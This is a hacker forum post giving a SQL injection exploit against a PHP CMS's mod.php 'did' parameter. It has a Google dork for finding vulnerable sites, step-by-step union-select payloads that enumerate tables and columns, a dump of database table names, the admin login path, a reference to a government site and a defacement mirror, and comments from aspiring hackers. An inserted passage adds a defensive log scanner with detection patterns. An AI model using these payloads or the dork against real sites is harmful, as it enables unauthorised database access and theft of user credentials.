./ author : LOL1ds
./ Push : LOL1ds[at]hackermail[dot]com
./ Target : http://localhost/mod.php?mod=
./ dork : mod.php?mod=diskus&op=viewdisk&did=target Vuln
++++++++++++++++++++++
info:
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
./ server : Apache/2.2.17 (Unix)
mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4
./ db serv: MySQLi
++++++++++++++++++++++
exp:
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
+order+by+1,2,3,4,5,6,7--
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
+union+select+1,2,group_concat(table_name),4,5,6,7+from
+information_schema.tables+where+table_schema=database()--
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
+union+select+1,2,group_concat(column_name),4,5,6,7+from
+information_schema.columns+where+table_name=0xLOL--
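Added example, not part of the original post: a log check a defender can run for the requests listed above. It assumes `did` is a plain integer id (as in `did=177`), flags any other value sent to mod.php, and labels the SQL keywords seen in this post. The log lines, IP addresses, Apache combined log format and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not from the original post).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2012:10:00:00 +0700] "GET /mod.php?mod=diskus&op=viewdisk&did=177 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2012:10:02:11 +0700] "GET /mod.php?mod=diskus&op=viewdisk&did=177+order+by+1,2,3,4,5,6,7-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2012:10:02:40 +0700] "GET /mod.php?mod=diskus&op=viewdisk&did=177%20UNION%20SELECT%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables-- HTTP/1.1" 200 6044 "-" "Mozilla/5.0"
192.0.2.77 - - [01/Jan/2012:10:05:00 +0700] "GET /index.php?id=5 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client address and request target from one access-log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Labels for the three request patterns shown in the "exp" section.
SIGNATURES = [
    ("column-count probe", re.compile(r"\border\s+by\b", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\b", re.I)),
]

def check_line(line):
    """Return (client, did_value, labels) for a suspicious line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/mod.php"):
        return None
    # parse_qs decodes %xx and '+', so encoded variants are matched in clear text.
    for value in parse_qs(url.query, keep_blank_values=True).get("did", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # expected form: a plain integer id
        labels = [name for name, rx in SIGNATURES if rx.search(value)]
        return client, value, labels or ["non-numeric did"]
    return None

def scan(log_text):
    """Check every line of a log and return the suspicious hits in order."""
    return [hit for hit in map(check_line, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, value, labels in scan(SAMPLE_LOG):
        print(client, labels, value[:60])
```

The same all-digits rule is the server-side fix: reject or integer-cast `did` before it reaches the query, and bind it as a parameter instead of concatenating it.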
++++++++++++++++++++++
./ inject db: authors,banner,bannerclient,bannerfinish,counter,
lblocks,main_page_content,menu,mod_,mod__categories,
mod__response,mod_katalog,mod_katalog_categories,
mod_katalog_validate,mod_poll_comments,mod_poll_data,
mod_poll_flag,mod_publisher,mod_publisher_categories,
mod_publisher_media,mod_publisher_submit,mod_userpage_data,
modules,new_referer,rblocks,users
./ from table "author"
./ usrname | email | pwd
db:
++++++++++++++++++++++++++
./admin:
./http://localhost/admin.php
++++++++++++++++++++++++++
./ deptan.go.id zone-h.org | deface.us
++++++++++++++++++++++++++
greaattzz to :
./Allah S.W.T
./moxer_crew | mbah | kojack | cute | gungz_andrew | di0 | s4m_dudunkz | 1Ch43.
./indonesianhacker team,surabayahackerlink,indonesiancoder,
jatimcrew,jogyacarderlink,devilzc0de,revengehack.
./all my preen! sorry i lost ur nem..
tag : SQL, injection, hacking, cracking, Vuln.
Bro, what's the full dork..??? Sorry, I'm still a newbie.
@Anonymous - maybe the dork is hidden so it can't be seen, great stuff.. bro, teach me too, okay.. hehe.. understandable, I'm still a total newbie too..
@jojo - wow.. there's a master here, have mercy master, I'm only sharing. I'm still a newbie :)
Boss, how do you figure out this code, boss 5b91a8d8c8628a9ce6accad8f70c4b46